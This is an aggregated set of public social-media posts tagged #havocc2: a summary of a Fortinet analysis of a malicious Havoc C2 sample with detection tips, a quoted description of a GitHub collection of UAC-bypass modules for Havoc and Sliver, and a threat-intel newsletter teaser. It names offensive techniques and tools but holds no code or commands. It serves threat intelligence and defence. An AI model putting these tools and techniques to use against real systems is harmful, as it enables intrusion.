#havocc2 — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #havocc2, aggregated by home.social.
-
Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.
@FortiGuardLabs just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.
Built for red teamers but abused by threat actors, this sample goes full dark mode:
- Shellcode loader in C++
- AES-encrypted payload
- XOR junk code to slow reverse engineering
- Dynamic API resolving
- LOLBin delivery via regsvr32
It’s like someone asked: “What if malware devs went full GitHub?” (never go full GitHub)
🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/dissecting-a-malicious-havoc-sampleTL;DR for blue teamers:
- Havoc ≠ harmless just because it’s open source
- Monitor regsvr32, rundll32, mshta — Havoc loves its LOLBins
- Watch for process injection + thread creation anomalies
- Memory analysis > file-based detection here
- Don’t assume your EDR is catching every beacon on port 443
Is it threat emulation or a real attack?
— Blue teamer having a full-blown identity crisis at 2am
Shoutout to @xpzhang and team for their amazing work!
#ThreatIntel #MalwareAnalysis #HavocC2 #RedTeamTools #PostExploitation #Infosec #BlueTeam #ReverseEngineering #CyberSecurity
-
https://github.com/icyguider/UAC-BOF-Bonanza
"This repository serves as a collection of public UAC bypass techniques that have been weaponized as BOFs. A single module which integrates all techniques has been provided to use the BOFs via the Havoc C2 Framework. A extension.json file has also been provided for each bypass technique for use in Sliver."
#hacking #pentesting #redteam #sliverc2 #sliver #BOF #Havoc #havocC2
-
Death by a thousand PaperCuts, China's APT41 uses new tricks to skirt EDR, and a pair of no-patch vulnerabilities take the front page in this weeks newsletter:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-01052023-07052023
The #PaperCut vulnerability continues to garner interest, with Iran's Mint SandStorm (formerly #PHOSPHORUS) and Mango SandStorm (formerly #MERCURY) seen using it opportunistically. A completely new exploit chain demo'd by Vulncheck researchers highlights the limitations of detection rules for assurances, and why patching is a must.
Earth Longzhi - a subset of the Chinese #APT41 Threat Group - has emerged after months in the shadows with new techniques seen in recent campaigns. Using Windows #Defender to side-load malware; the BYOVD technique to kill #EDR processes, and a newly discovered technique called "stack rumbling" to ensure they can't recover - this one is definitely one to check out.
Fortinet have warned of a recent wave of exploitation of a 5-year-old vulnerability with no patches being exploited en masse in late April, while #Cisco reveal a CVSS 9.8 vulnerability they have no plans to patch in their End-of-Support #VoIP phone adapters.
There's a bunch of great write-ups for those in the #redteam, looking at bypassing WAF protections by running tools like SQLMap over #Tor, how to minimise the size of your #XSS payloads, and highlighting a bunch of lab/ctf-style environments to cut your teeth on Azure, AWS, Kubernetes, and more.
The #blueteam can brush up on commonly abused misconfigurations in Active Directory, #AzureAD, and #Microsoft365, as well as some excellent tips on hunting the Open Source Posh, Deimos, and Havoc C2 frameworks using #Shodan and #Censys.
Elastic Labs have also outdone themselves last week, releasing a suite of tools to decrypt, decompress, recompile, extract and/or parse various malware payloads distributed in recent #IcedID campaigns.
There's lots to dig through before starting your work week, so get started here:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-01052023-07052023
#infosec #cyber #news #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #exploitation #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #MangoSandstorm #MintSandstorm #Iran #EarthLongzhi #StackRumbling #clop #PoC #exploit #securityresearch #BYOVD #AWS #Azure #Kubernetes #GCP #PoshC2 #DeimosC2 #HavocC2